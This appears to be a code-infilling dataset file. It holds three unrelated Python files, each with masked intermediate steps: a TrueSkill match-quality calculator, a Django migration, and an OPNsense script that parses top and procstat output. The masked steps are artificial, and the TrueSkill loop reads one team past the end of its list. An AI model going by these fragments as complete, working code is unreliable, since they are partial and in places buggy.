playerAssignments = list()
totalPreviousPlayers = 0
for i in range(len(teamAssignmentsList)):
currentTeam = teamAssignmentsList[i]
currentRowValues = [0] * totalPreviousPlayers
playerAssignments.append(currentRowValues)
for currentRating in currentTeam:
currentRowValues.append(getPartialPlayPercentage(
currentRating[0]))
totalPreviousPlayers += 1
nextTeam = teamAssignmentsList[i + 1]
for nextTeamPlayerPair in nextTeam:
currentRowValues.append(-1 * getPartialPlayPercentage(
nextTeamPlayerPair[0]))
return Matrix(totalPlayers, len(teamAssignmentsList) - 1,
playerAssignments)
<|reserved_special_token_1|>
from layers import TrueSkillFactorGraph
from math import e, sqrt
from numerics import atLeast, _Vector, _DiagonalMatrix, Matrix
from objects import SkillCalculator, SupportedOptions, argumentNotNone, \
getPartialPlayPercentage, sortByRank
class FactorGraphTrueSkillCalculator(SkillCalculator):
def __init__(self):
super(FactorGraphTrueSkillCalculator, self).__init__(SupportedOptions.PARTIAL_PLAY | SupportedOptions.PARTIAL_UPDATE, atLeast(2), atLeast(1))
def calculateNewRatings(self, gameInfo, teams, teamRanks):
argumentNotNone(gameInfo, "gameInfo")
self._validateTeamCountAndPlayersCountPerTeam(teams)
teams, teamRanks = sortByRank(teams, teamRanks)
factorGraph = TrueSkillFactorGraph(gameInfo, teams, teamRanks)
factorGraph.buildGraph()
factorGraph.runSchedule()
return factorGraph.getUpdatedRatings()
def calculateMatchQuality(self, gameInfo, teams):
skillsMatrix = self._getPlayerCovarianceMatrix(teams)
meanVector = self._getPlayerMeansVector(teams)
meanVectorTranspose = meanVector.transpose
playerTeamAssignmentsMatrix = self._createPlayerTeamAssignmentMatrix(teams, meanVector.rows)
playerTeamAssignmentsMatrixTranspose = playerTeamAssignmentsMatrix.transpose
betaSquared = gameInfo.beta**2.0
start = meanVectorTranspose * playerTeamAssignmentsMatrix
aTa = (betaSquared * playerTeamAssignmentsMatrixTranspose) * playerTeamAssignmentsMatrix
aTSA = playerTeamAssignmentsMatrixTranspose * skillsMatrix * playerTeamAssignmentsMatrix
middle = aTa + aTSA
middleInverse = middle.inverse
end = playerTeamAssignmentsMatrixTranspose * meanVector
expPartMatrix = (start * middleInverse * end) * -0.5
expPart = expPartMatrix.determinant
sqrtPartNumerator = aTa.determinant
sqrtPartDenominator = middle.determinant
sqrtPart = sqrtPartNumerator / sqrtPartDenominator
result = (e**expPart) * sqrt(sqrtPart)
return result
def _getPlayerMeansVector(self, teamAssignmentsList):
return _Vector(self._getPlayerRatingValues(teamAssignmentsList, lambda rating: rating.mean))
def _getPlayerCovarianceMatrix(self, teamAssignmentsList):
return _DiagonalMatrix(self._getPlayerRatingValues(teamAssignmentsList, lambda rating: rating.standardDeviation**2.0))
def _getPlayerRatingValues(self, teamAssigmentsList, playerRatingFunction):
playerRatingValues = list()
for currentTeam in teamAssigmentsList:
for currentRating in currentTeam.values:
playerRatingValues.append(playerRatingFunction(currentRating))
return playerRatingValues
def _createPlayerTeamAssignmentMatrix(self, teamAssignmentsList, totalPlayers):
playerAssignments = list()
totalPreviousPlayers = 0
for i in range(len(teamAssignmentsList)):
currentTeam = teamAssignmentsList[i]
currentRowValues = [0] * totalPreviousPlayers
playerAssignments.append(currentRowValues)
for currentRating in currentTeam:
currentRowValues.append(getPartialPlayPercentage(currentRating[0]))
totalPreviousPlayers += 1
nextTeam = teamAssignmentsList[i + 1]
for nextTeamPlayerPair in nextTeam:
currentRowValues.append(-1 * getPartialPlayPercentage(nextTeamPlayerPair[0]))
return Matrix(totalPlayers, len(teamAssignmentsList) - 1, playerAssignments)
|
flexible
|
{
"blob_id": "009be282e45d191eb8f4d7d2986a2f182d64c1dd",
"index": 2935,
"step-1": "<mask token>\n\n\nclass FactorGraphTrueSkillCalculator(SkillCalculator):\n\n def __init__(self):\n super(FactorGraphTrueSkillCalculator, self).__init__(\n SupportedOptions.PARTIAL_PLAY | SupportedOptions.PARTIAL_UPDATE,\n atLeast(2), atLeast(1))\n <mask token>\n\n def calculateMatchQuality(self, gameInfo, teams):\n skillsMatrix = self._getPlayerCovarianceMatrix(teams)\n meanVector = self._getPlayerMeansVector(teams)\n meanVectorTranspose = meanVector.transpose\n playerTeamAssignmentsMatrix = self._createPlayerTeamAssignmentMatrix(\n teams, meanVector.rows)\n playerTeamAssignmentsMatrixTranspose = (playerTeamAssignmentsMatrix\n .transpose)\n betaSquared = gameInfo.beta ** 2.0\n start = meanVectorTranspose * playerTeamAssignmentsMatrix\n aTa = (betaSquared * playerTeamAssignmentsMatrixTranspose *\n playerTeamAssignmentsMatrix)\n aTSA = (playerTeamAssignmentsMatrixTranspose * skillsMatrix *\n playerTeamAssignmentsMatrix)\n middle = aTa + aTSA\n middleInverse = middle.inverse\n end = playerTeamAssignmentsMatrixTranspose * meanVector\n expPartMatrix = start * middleInverse * end * -0.5\n expPart = expPartMatrix.determinant\n sqrtPartNumerator = aTa.determinant\n sqrtPartDenominator = middle.determinant\n sqrtPart = sqrtPartNumerator / sqrtPartDenominator\n result = e ** expPart * sqrt(sqrtPart)\n return result\n\n def _getPlayerMeansVector(self, teamAssignmentsList):\n return _Vector(self._getPlayerRatingValues(teamAssignmentsList, lambda\n rating: rating.mean))\n\n def _getPlayerCovarianceMatrix(self, teamAssignmentsList):\n return _DiagonalMatrix(self._getPlayerRatingValues(\n teamAssignmentsList, lambda rating: rating.standardDeviation **\n 2.0))\n\n def _getPlayerRatingValues(self, teamAssigmentsList, playerRatingFunction):\n playerRatingValues = list()\n for currentTeam in teamAssigmentsList:\n for currentRating in currentTeam.values:\n playerRatingValues.append(playerRatingFunction(currentRating))\n return playerRatingValues\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass FactorGraphTrueSkillCalculator(SkillCalculator):\n\n def __init__(self):\n super(FactorGraphTrueSkillCalculator, self).__init__(\n SupportedOptions.PARTIAL_PLAY | SupportedOptions.PARTIAL_UPDATE,\n atLeast(2), atLeast(1))\n <mask token>\n\n def calculateMatchQuality(self, gameInfo, teams):\n skillsMatrix = self._getPlayerCovarianceMatrix(teams)\n meanVector = self._getPlayerMeansVector(teams)\n meanVectorTranspose = meanVector.transpose\n playerTeamAssignmentsMatrix = self._createPlayerTeamAssignmentMatrix(\n teams, meanVector.rows)\n playerTeamAssignmentsMatrixTranspose = (playerTeamAssignmentsMatrix\n .transpose)\n betaSquared = gameInfo.beta ** 2.0\n start = meanVectorTranspose * playerTeamAssignmentsMatrix\n aTa = (betaSquared * playerTeamAssignmentsMatrixTranspose *\n playerTeamAssignmentsMatrix)\n aTSA = (playerTeamAssignmentsMatrixTranspose * skillsMatrix *\n playerTeamAssignmentsMatrix)\n middle = aTa + aTSA\n middleInverse = middle.inverse\n end = playerTeamAssignmentsMatrixTranspose * meanVector\n expPartMatrix = start * middleInverse * end * -0.5\n expPart = expPartMatrix.determinant\n sqrtPartNumerator = aTa.determinant\n sqrtPartDenominator = middle.determinant\n sqrtPart = sqrtPartNumerator / sqrtPartDenominator\n result = e ** expPart * sqrt(sqrtPart)\n return result\n\n def _getPlayerMeansVector(self, teamAssignmentsList):\n return _Vector(self._getPlayerRatingValues(teamAssignmentsList, lambda\n rating: rating.mean))\n\n def _getPlayerCovarianceMatrix(self, teamAssignmentsList):\n return _DiagonalMatrix(self._getPlayerRatingValues(\n teamAssignmentsList, lambda rating: rating.standardDeviation **\n 2.0))\n\n def _getPlayerRatingValues(self, teamAssigmentsList, playerRatingFunction):\n playerRatingValues = list()\n for currentTeam in teamAssigmentsList:\n for currentRating in currentTeam.values:\n playerRatingValues.append(playerRatingFunction(currentRating))\n return playerRatingValues\n\n def _createPlayerTeamAssignmentMatrix(self, teamAssignmentsList,\n totalPlayers):\n playerAssignments = list()\n totalPreviousPlayers = 0\n for i in range(len(teamAssignmentsList)):\n currentTeam = teamAssignmentsList[i]\n currentRowValues = [0] * totalPreviousPlayers\n playerAssignments.append(currentRowValues)\n for currentRating in currentTeam:\n currentRowValues.append(getPartialPlayPercentage(\n currentRating[0]))\n totalPreviousPlayers += 1\n nextTeam = teamAssignmentsList[i + 1]\n for nextTeamPlayerPair in nextTeam:\n currentRowValues.append(-1 * getPartialPlayPercentage(\n nextTeamPlayerPair[0]))\n return Matrix(totalPlayers, len(teamAssignmentsList) - 1,\n playerAssignments)\n",
"step-3": "<mask token>\n\n\nclass FactorGraphTrueSkillCalculator(SkillCalculator):\n\n def __init__(self):\n super(FactorGraphTrueSkillCalculator, self).__init__(\n SupportedOptions.PARTIAL_PLAY | SupportedOptions.PARTIAL_UPDATE,\n atLeast(2), atLeast(1))\n\n def calculateNewRatings(self, gameInfo, teams, teamRanks):\n argumentNotNone(gameInfo, 'gameInfo')\n self._validateTeamCountAndPlayersCountPerTeam(teams)\n teams, teamRanks = sortByRank(teams, teamRanks)\n factorGraph = TrueSkillFactorGraph(gameInfo, teams, teamRanks)\n factorGraph.buildGraph()\n factorGraph.runSchedule()\n return factorGraph.getUpdatedRatings()\n\n def calculateMatchQuality(self, gameInfo, teams):\n skillsMatrix = self._getPlayerCovarianceMatrix(teams)\n meanVector = self._getPlayerMeansVector(teams)\n meanVectorTranspose = meanVector.transpose\n playerTeamAssignmentsMatrix = self._createPlayerTeamAssignmentMatrix(\n teams, meanVector.rows)\n playerTeamAssignmentsMatrixTranspose = (playerTeamAssignmentsMatrix\n .transpose)\n betaSquared = gameInfo.beta ** 2.0\n start = meanVectorTranspose * playerTeamAssignmentsMatrix\n aTa = (betaSquared * playerTeamAssignmentsMatrixTranspose *\n playerTeamAssignmentsMatrix)\n aTSA = (playerTeamAssignmentsMatrixTranspose * skillsMatrix *\n playerTeamAssignmentsMatrix)\n middle = aTa + aTSA\n middleInverse = middle.inverse\n end = playerTeamAssignmentsMatrixTranspose * meanVector\n expPartMatrix = start * middleInverse * end * -0.5\n expPart = expPartMatrix.determinant\n sqrtPartNumerator = aTa.determinant\n sqrtPartDenominator = middle.determinant\n sqrtPart = sqrtPartNumerator / sqrtPartDenominator\n result = e ** expPart * sqrt(sqrtPart)\n return result\n\n def _getPlayerMeansVector(self, teamAssignmentsList):\n return _Vector(self._getPlayerRatingValues(teamAssignmentsList, lambda\n rating: rating.mean))\n\n def _getPlayerCovarianceMatrix(self, teamAssignmentsList):\n return _DiagonalMatrix(self._getPlayerRatingValues(\n teamAssignmentsList, lambda rating: rating.standardDeviation **\n 2.0))\n\n def _getPlayerRatingValues(self, teamAssigmentsList, playerRatingFunction):\n playerRatingValues = list()\n for currentTeam in teamAssigmentsList:\n for currentRating in currentTeam.values:\n playerRatingValues.append(playerRatingFunction(currentRating))\n return playerRatingValues\n\n def _createPlayerTeamAssignmentMatrix(self, teamAssignmentsList,\n totalPlayers):\n playerAssignments = list()\n totalPreviousPlayers = 0\n for i in range(len(teamAssignmentsList)):\n currentTeam = teamAssignmentsList[i]\n currentRowValues = [0] * totalPreviousPlayers\n playerAssignments.append(currentRowValues)\n for currentRating in currentTeam:\n currentRowValues.append(getPartialPlayPercentage(\n currentRating[0]))\n totalPreviousPlayers += 1\n nextTeam = teamAssignmentsList[i + 1]\n for nextTeamPlayerPair in nextTeam:\n currentRowValues.append(-1 * getPartialPlayPercentage(\n nextTeamPlayerPair[0]))\n return Matrix(totalPlayers, len(teamAssignmentsList) - 1,\n playerAssignments)\n",
"step-4": "from layers import TrueSkillFactorGraph\nfrom math import e, sqrt\nfrom numerics import atLeast, _Vector, _DiagonalMatrix, Matrix\nfrom objects import SkillCalculator, SupportedOptions, argumentNotNone, getPartialPlayPercentage, sortByRank\n\n\nclass FactorGraphTrueSkillCalculator(SkillCalculator):\n\n def __init__(self):\n super(FactorGraphTrueSkillCalculator, self).__init__(\n SupportedOptions.PARTIAL_PLAY | SupportedOptions.PARTIAL_UPDATE,\n atLeast(2), atLeast(1))\n\n def calculateNewRatings(self, gameInfo, teams, teamRanks):\n argumentNotNone(gameInfo, 'gameInfo')\n self._validateTeamCountAndPlayersCountPerTeam(teams)\n teams, teamRanks = sortByRank(teams, teamRanks)\n factorGraph = TrueSkillFactorGraph(gameInfo, teams, teamRanks)\n factorGraph.buildGraph()\n factorGraph.runSchedule()\n return factorGraph.getUpdatedRatings()\n\n def calculateMatchQuality(self, gameInfo, teams):\n skillsMatrix = self._getPlayerCovarianceMatrix(teams)\n meanVector = self._getPlayerMeansVector(teams)\n meanVectorTranspose = meanVector.transpose\n playerTeamAssignmentsMatrix = self._createPlayerTeamAssignmentMatrix(\n teams, meanVector.rows)\n playerTeamAssignmentsMatrixTranspose = (playerTeamAssignmentsMatrix\n .transpose)\n betaSquared = gameInfo.beta ** 2.0\n start = meanVectorTranspose * playerTeamAssignmentsMatrix\n aTa = (betaSquared * playerTeamAssignmentsMatrixTranspose *\n playerTeamAssignmentsMatrix)\n aTSA = (playerTeamAssignmentsMatrixTranspose * skillsMatrix *\n playerTeamAssignmentsMatrix)\n middle = aTa + aTSA\n middleInverse = middle.inverse\n end = playerTeamAssignmentsMatrixTranspose * meanVector\n expPartMatrix = start * middleInverse * end * -0.5\n expPart = expPartMatrix.determinant\n sqrtPartNumerator = aTa.determinant\n sqrtPartDenominator = middle.determinant\n sqrtPart = sqrtPartNumerator / sqrtPartDenominator\n result = e ** expPart * sqrt(sqrtPart)\n return result\n\n def _getPlayerMeansVector(self, teamAssignmentsList):\n return _Vector(self._getPlayerRatingValues(teamAssignmentsList, lambda\n rating: rating.mean))\n\n def _getPlayerCovarianceMatrix(self, teamAssignmentsList):\n return _DiagonalMatrix(self._getPlayerRatingValues(\n teamAssignmentsList, lambda rating: rating.standardDeviation **\n 2.0))\n\n def _getPlayerRatingValues(self, teamAssigmentsList, playerRatingFunction):\n playerRatingValues = list()\n for currentTeam in teamAssigmentsList:\n for currentRating in currentTeam.values:\n playerRatingValues.append(playerRatingFunction(currentRating))\n return playerRatingValues\n\n def _createPlayerTeamAssignmentMatrix(self, teamAssignmentsList,\n totalPlayers):\n playerAssignments = list()\n totalPreviousPlayers = 0\n for i in range(len(teamAssignmentsList)):\n currentTeam = teamAssignmentsList[i]\n currentRowValues = [0] * totalPreviousPlayers\n playerAssignments.append(currentRowValues)\n for currentRating in currentTeam:\n currentRowValues.append(getPartialPlayPercentage(\n currentRating[0]))\n totalPreviousPlayers += 1\n nextTeam = teamAssignmentsList[i + 1]\n for nextTeamPlayerPair in nextTeam:\n currentRowValues.append(-1 * getPartialPlayPercentage(\n nextTeamPlayerPair[0]))\n return Matrix(totalPlayers, len(teamAssignmentsList) - 1,\n playerAssignments)\n",
"step-5": "from layers import TrueSkillFactorGraph\nfrom math import e, sqrt\nfrom numerics import atLeast, _Vector, _DiagonalMatrix, Matrix\nfrom objects import SkillCalculator, SupportedOptions, argumentNotNone, \\\n\tgetPartialPlayPercentage, sortByRank\n\nclass FactorGraphTrueSkillCalculator(SkillCalculator):\n\tdef __init__(self):\n\t\tsuper(FactorGraphTrueSkillCalculator, self).__init__(SupportedOptions.PARTIAL_PLAY | SupportedOptions.PARTIAL_UPDATE, atLeast(2), atLeast(1))\n\t\n\tdef calculateNewRatings(self, gameInfo, teams, teamRanks):\n\t\targumentNotNone(gameInfo, \"gameInfo\")\n\t\tself._validateTeamCountAndPlayersCountPerTeam(teams)\n\t\tteams, teamRanks = sortByRank(teams, teamRanks)\n\t\t\n\t\tfactorGraph = TrueSkillFactorGraph(gameInfo, teams, teamRanks)\n\t\tfactorGraph.buildGraph()\n\t\tfactorGraph.runSchedule()\t\n\t\t\n\t\treturn factorGraph.getUpdatedRatings()\n\t\t\n\tdef calculateMatchQuality(self, gameInfo, teams):\n\t\tskillsMatrix = self._getPlayerCovarianceMatrix(teams)\n\t\tmeanVector = self._getPlayerMeansVector(teams)\n\t\tmeanVectorTranspose = meanVector.transpose\n\t\t\n\t\tplayerTeamAssignmentsMatrix = self._createPlayerTeamAssignmentMatrix(teams, meanVector.rows)\n\t\tplayerTeamAssignmentsMatrixTranspose = playerTeamAssignmentsMatrix.transpose\n\t\t\n\t\tbetaSquared = gameInfo.beta**2.0\n\t\t\n\t\tstart = meanVectorTranspose * playerTeamAssignmentsMatrix\n\t\taTa = (betaSquared * playerTeamAssignmentsMatrixTranspose) * playerTeamAssignmentsMatrix\n\t\taTSA = playerTeamAssignmentsMatrixTranspose * skillsMatrix * playerTeamAssignmentsMatrix\n\t\tmiddle = aTa + aTSA\n\t\t\n\t\tmiddleInverse = middle.inverse\n\t\t\n\t\tend = playerTeamAssignmentsMatrixTranspose * meanVector\n\t\t\n\t\texpPartMatrix = (start * middleInverse * end) * -0.5\n\t\texpPart = expPartMatrix.determinant\n\t\t\n\t\tsqrtPartNumerator = aTa.determinant\n\t\tsqrtPartDenominator = middle.determinant\n\t\tsqrtPart = sqrtPartNumerator / sqrtPartDenominator\n\t\t\n\t\tresult = (e**expPart) * sqrt(sqrtPart)\n\t\t\n\t\treturn result\n\t\t\n\tdef _getPlayerMeansVector(self, teamAssignmentsList):\n\t\treturn _Vector(self._getPlayerRatingValues(teamAssignmentsList, lambda rating: rating.mean))\n\t\t\n\tdef _getPlayerCovarianceMatrix(self, teamAssignmentsList):\n\t\treturn _DiagonalMatrix(self._getPlayerRatingValues(teamAssignmentsList, lambda rating: rating.standardDeviation**2.0))\n\t\t\n\tdef _getPlayerRatingValues(self, teamAssigmentsList, playerRatingFunction):\n\t\tplayerRatingValues = list()\n\t\tfor currentTeam in teamAssigmentsList:\n\t\t\tfor currentRating in currentTeam.values:\n\t\t\t\tplayerRatingValues.append(playerRatingFunction(currentRating))\n\t\treturn playerRatingValues\n\t\n\tdef _createPlayerTeamAssignmentMatrix(self, teamAssignmentsList, totalPlayers):\n\t\tplayerAssignments = list()\n\t\ttotalPreviousPlayers = 0\n\t\t\n\t\tfor i in range(len(teamAssignmentsList)):\n\t\t\tcurrentTeam = teamAssignmentsList[i]\n\t\t\tcurrentRowValues = [0] * totalPreviousPlayers\n\t\t\tplayerAssignments.append(currentRowValues)\n\t\t\t\n\t\t\tfor currentRating in currentTeam:\n\t\t\t\tcurrentRowValues.append(getPartialPlayPercentage(currentRating[0]))\n\t\t\t\ttotalPreviousPlayers += 1\n\t\t\t\t\n\t\t\tnextTeam = teamAssignmentsList[i + 1]\n\t\t\tfor nextTeamPlayerPair in nextTeam:\n\t\t\t\tcurrentRowValues.append(-1 * getPartialPlayPercentage(nextTeamPlayerPair[0]))\n\t\t\t\t\n\t\treturn Matrix(totalPlayers, len(teamAssignmentsList) - 1, playerAssignments)\n",
"step-ids": [
6,
7,
8,
9,
10
]
}
|
[
6,
7,
8,
9,
10
] |
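Reading the algebra out of calculateMatchQuality above: with \mu the stacked vector of player skill means, \Sigma the diagonal matrix of skill variances, and A the player-team assignment matrix (partial-play weights, each team offset against the next), the returned quality is

q = \sqrt{\frac{\det(\beta^{2} A^{\mathsf{T}} A)}{\det(\beta^{2} A^{\mathsf{T}} A + A^{\mathsf{T}} \Sigma A)}} \, \exp\!\left(-\tfrac{1}{2}\, \mu^{\mathsf{T}} A \left(\beta^{2} A^{\mathsf{T}} A + A^{\mathsf{T}} \Sigma A\right)^{-1} A^{\mathsf{T}} \mu\right)

which is the standard TrueSkill match-quality expression; values near 1 indicate an evenly matched game. One caveat as quoted: _createPlayerTeamAssignmentMatrix indexes teamAssignmentsList[i + 1] while i runs over the full range(len(teamAssignmentsList)), so the last iteration raises IndexError; presumably the loop was meant to stop one team short, i.e. range(len(teamAssignmentsList) - 1).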
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Migration(migrations.Migration):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Migration(migrations.Migration):
dependencies = [('talk', '0023_auto_20180207_1121')]
operations = [migrations.AddField(model_name='talkmedia', name=
'codelink', field=models.CharField(blank=True, max_length=255,
verbose_name='Source code'))]
<|reserved_special_token_1|>
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [('talk', '0023_auto_20180207_1121')]
operations = [migrations.AddField(model_name='talkmedia', name=
'codelink', field=models.CharField(blank=True, max_length=255,
verbose_name='Source code'))]
<|reserved_special_token_1|>
# -*- coding: utf-8 -*-
# Generated by Django 1.9.8 on 2018-04-27 08:05
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('talk', '0023_auto_20180207_1121'),
]
operations = [
migrations.AddField(
model_name='talkmedia',
name='codelink',
field=models.CharField(blank=True, max_length=255, verbose_name='Source code'),
),
]
|
flexible
|
{
"blob_id": "f85a703b47d981397ed6048e941030a3fbee7b6d",
"index": 229,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Migration(migrations.Migration):\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Migration(migrations.Migration):\n dependencies = [('talk', '0023_auto_20180207_1121')]\n operations = [migrations.AddField(model_name='talkmedia', name=\n 'codelink', field=models.CharField(blank=True, max_length=255,\n verbose_name='Source code'))]\n",
"step-4": "from __future__ import unicode_literals\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n dependencies = [('talk', '0023_auto_20180207_1121')]\n operations = [migrations.AddField(model_name='talkmedia', name=\n 'codelink', field=models.CharField(blank=True, max_length=255,\n verbose_name='Source code'))]\n",
"step-5": "# -*- coding: utf-8 -*-\n# Generated by Django 1.9.8 on 2018-04-27 08:05\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('talk', '0023_auto_20180207_1121'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='talkmedia',\n name='codelink',\n field=models.CharField(blank=True, max_length=255, verbose_name='Source code'),\n ),\n ]\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
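The migration row above adds a single CharField column; blank=True affects form validation only, so the schema change is one ALTER TABLE. A hedged way to preview the exact SQL from inside the project follows; the migration label '0024' is a guess from the 0023 dependency, since the row does not show the filename.

# Run inside the Django project (e.g. in `manage.py shell`); prints the SQL
# without applying it. '0024' is an assumed migration label, not from the row.
from django.core.management import call_command
call_command('sqlmigrate', 'talk', '0024')

On PostgreSQL the output would be roughly ALTER TABLE "talk_talkmedia" ADD COLUMN "codelink" varchar(255) NOT NULL, with exact NULL and DEFAULT handling depending on the backend and any default supplied when the migration was created.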
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
if __name__ == '__main__':
fieldnames = None
field_max_width = dict()
result = {'headers': [], 'details': []}
is_header = True
tidpid = dict()
for line in subprocess.run(['/usr/bin/procstat', '-ath'],
capture_output=True, text=True).stdout.split('\n'):
parts = line.split(maxsplit=2)
if len(parts) > 1:
tidpid[parts[1]] = parts[0]
sp = subprocess.run(['/usr/bin/top', '-aHSTn', '-d2', '999999'],
capture_output=True, text=True)
topData = sp.stdout.strip().split('\n\n', 2)[-1]
for line in topData.split('\n'):
if line.find('USERNAME') > -1 and line.find('COMMAND') > -1:
is_header = False
if is_header:
if len(line.strip()) > 0:
result['headers'].append(line)
elif fieldnames is None:
fieldnames = ['PID'] + line.split()
else:
tmp = line.split(maxsplit=10)
record = {'C': '0'}
for field_id in range(len(fieldnames)):
fieldname = fieldnames[field_id]
if field_id == 0:
record[fieldname] = tidpid[tmp[0]] if tmp[0
] in tidpid else ''
else:
record[fieldname] = tmp[field_id - 1]
if fieldname not in field_max_width or field_max_width[
fieldname] < len(record[fieldname]):
field_max_width[fieldname] = len(record[fieldname])
result['details'].append(record)
if len(sys.argv) > 1 and sys.argv[1] == 'json':
print(ujson.dumps(result))
else:
for header_line in result['headers']:
print(header_line)
print('\n')
if fieldnames is not None:
format_str = ''
header_fields = {}
for fieldname in fieldnames:
format_str = '%s %%(%s)-%ds' % (format_str, fieldname,
field_max_width[fieldname] + 1)
header_fields[fieldname] = fieldname
print(format_str % header_fields)
for detail_line in result['details']:
print(format_str % detail_line)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
import collections
import tempfile
import subprocess
import os
import sys
import ujson
if __name__ == '__main__':
fieldnames = None
field_max_width = dict()
result = {'headers': [], 'details': []}
is_header = True
tidpid = dict()
for line in subprocess.run(['/usr/bin/procstat', '-ath'],
capture_output=True, text=True).stdout.split('\n'):
parts = line.split(maxsplit=2)
if len(parts) > 1:
tidpid[parts[1]] = parts[0]
sp = subprocess.run(['/usr/bin/top', '-aHSTn', '-d2', '999999'],
capture_output=True, text=True)
topData = sp.stdout.strip().split('\n\n', 2)[-1]
for line in topData.split('\n'):
if line.find('USERNAME') > -1 and line.find('COMMAND') > -1:
is_header = False
if is_header:
if len(line.strip()) > 0:
result['headers'].append(line)
elif fieldnames is None:
fieldnames = ['PID'] + line.split()
else:
tmp = line.split(maxsplit=10)
record = {'C': '0'}
for field_id in range(len(fieldnames)):
fieldname = fieldnames[field_id]
if field_id == 0:
record[fieldname] = tidpid[tmp[0]] if tmp[0
] in tidpid else ''
else:
record[fieldname] = tmp[field_id - 1]
if fieldname not in field_max_width or field_max_width[
fieldname] < len(record[fieldname]):
field_max_width[fieldname] = len(record[fieldname])
result['details'].append(record)
if len(sys.argv) > 1 and sys.argv[1] == 'json':
print(ujson.dumps(result))
else:
for header_line in result['headers']:
print(header_line)
print('\n')
if fieldnames is not None:
format_str = ''
header_fields = {}
for fieldname in fieldnames:
format_str = '%s %%(%s)-%ds' % (format_str, fieldname,
field_max_width[fieldname] + 1)
header_fields[fieldname] = fieldname
print(format_str % header_fields)
for detail_line in result['details']:
print(format_str % detail_line)
<|reserved_special_token_1|>
#!/usr/local/bin/python3
"""
Copyright (c) 2015-2019 Ad Schellevis <ad@opnsense.org>
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
1. Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
THIS SOFTWARE IS PROVIDED ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES,
INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY
AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,
OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
POSSIBILITY OF SUCH DAMAGE.
--------------------------------------------------------------------------------------
returns system activity (top)
"""
import collections
import tempfile
import subprocess
import os
import sys
import ujson
if __name__ == '__main__':
fieldnames = None
field_max_width = dict()
result = {'headers': [], 'details': []}
is_header = True
tidpid = dict()
for line in subprocess.run(['/usr/bin/procstat','-ath'], capture_output=True, text=True).stdout.split('\n'):
parts = line.split(maxsplit=2)
if len(parts) > 1:
tidpid[parts[1]] = parts[0]
# grab second display so that CPU time data appears
sp = subprocess.run(['/usr/bin/top','-aHSTn','-d2','999999'], capture_output=True, text=True)
topData = sp.stdout.strip().split('\n\n',2)[-1]
for line in topData.split('\n'):
# end of header, start of top detection
if line.find('USERNAME') > -1 and line.find('COMMAND') > -1:
is_header = False
if is_header:
# parse headers from top command, add to result
if len(line.strip()) > 0:
result['headers'].append(line)
else:
# parse details including fieldnames (leave original)
if fieldnames is None:
fieldnames = ['PID'] + line.split()
else:
tmp = line.split(maxsplit=10)
record = {'C': '0'}
for field_id in range(len(fieldnames)):
fieldname = fieldnames[field_id]
if field_id == 0: # PID
record[fieldname] = tidpid[tmp[0]] if tmp[0] in tidpid else ''
else:
record[fieldname] = tmp[field_id - 1]
if fieldname not in field_max_width or field_max_width[fieldname] < len(record[fieldname]):
field_max_width[fieldname] = len(record[fieldname])
result['details'].append(record)
if len(sys.argv) > 1 and sys.argv[1] == 'json':
# output as json
print(ujson.dumps(result))
else:
# output plain (reconstruct data)
for header_line in result['headers']:
print (header_line)
print ("\n")
if fieldnames is not None:
format_str = ""
header_fields = {}
for fieldname in fieldnames:
format_str = '%s %%(%s)-%ds'%(format_str,fieldname, field_max_width[fieldname]+1)
header_fields[fieldname] = fieldname
print (format_str % header_fields)
for detail_line in result['details']:
print (format_str % detail_line)
|
flexible
|
{
"blob_id": "f4ae34be2be2b47b3394e6da751c53c51a1c3174",
"index": 6678,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nif __name__ == '__main__':\n fieldnames = None\n field_max_width = dict()\n result = {'headers': [], 'details': []}\n is_header = True\n tidpid = dict()\n for line in subprocess.run(['/usr/bin/procstat', '-ath'],\n capture_output=True, text=True).stdout.split('\\n'):\n parts = line.split(maxsplit=2)\n if len(parts) > 1:\n tidpid[parts[1]] = parts[0]\n sp = subprocess.run(['/usr/bin/top', '-aHSTn', '-d2', '999999'],\n capture_output=True, text=True)\n topData = sp.stdout.strip().split('\\n\\n', 2)[-1]\n for line in topData.split('\\n'):\n if line.find('USERNAME') > -1 and line.find('COMMAND') > -1:\n is_header = False\n if is_header:\n if len(line.strip()) > 0:\n result['headers'].append(line)\n elif fieldnames is None:\n fieldnames = ['PID'] + line.split()\n else:\n tmp = line.split(maxsplit=10)\n record = {'C': '0'}\n for field_id in range(len(fieldnames)):\n fieldname = fieldnames[field_id]\n if field_id == 0:\n record[fieldname] = tidpid[tmp[0]] if tmp[0\n ] in 